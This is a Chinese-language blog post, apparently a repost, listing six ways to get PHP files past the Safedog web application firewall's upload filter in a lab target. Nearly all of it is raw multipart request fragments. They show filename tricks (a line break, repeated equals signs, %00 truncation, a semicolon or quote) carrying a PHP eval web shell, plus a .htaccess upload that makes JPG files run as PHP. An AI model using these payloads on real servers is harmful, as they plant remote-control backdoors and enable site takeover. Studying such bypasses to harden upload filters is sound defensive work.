文件上傳

文件上傳實質上還是客戶端的POST請求，消息主體是一些上傳信息。前端上傳頁面需要指定
enctype為multipart/from-data才能正常上傳文件。

此處不講各種中間件解析漏洞只列舉集幾種safe_dog對腳本文件上傳攔截的繞過
靶機環境：win2003+safe_dog4.0.23957+webug中的上傳

1、換行

Content-Disposition: form-data; name="file"; filename="1.p
hp"
Content-Type: image/jpeg
<?php @eval($_POST[1])?>
-----------------------------127619278770

2、多個等號(不止2，3個)

Content-Disposition: form-data; name="file"; filename=="2.php"
Content-Type: image/jpeg
<?php @eval($_POST[1])?>
-----------------------------127619278770

Content-Disposition: form-data; name="file"; filename==="3.php"
Content-Type: image/jpeg
<?php @eval($_POST[1])?>
-----------------------------127619278770

3、00截斷

Content-Disposition: form-data; name="file"; filename="4.php%00"
Content-Type: image/jpeg
<?php @eval($_POST[1])?>
-----------------------------127619278770

4、文件名+；號

Content-Disposition: form-data; name="file"; filename="6;.php"
Content-Type: image/jpeg
<?php phpinfo()?>
-----------------------------127619278770

5、文件名+‘

Content-Disposition: form-data; name="file"; filename="7'.php"
Content-Type: image/jpeg
<?php phpinfo()?>
-----------------------------127619278770

6、上傳.htaccess

Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg
AddType application/x-httpd-php jpg
-----------------------------127619278770

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 文件上傳之WAF繞過及相安全防護 24：WEB漏洞-文件上傳之WAF繞過及安全修復上傳繞過WAF的tips大全上傳繞過WAF幾種常見的姿勢上傳繞過WAF幾種常見的姿勢文件上傳和WAF的攻與防文件上傳漏洞及繞過文件上傳漏洞及其繞過文件上傳繞過總結文件上傳各種檢測繞過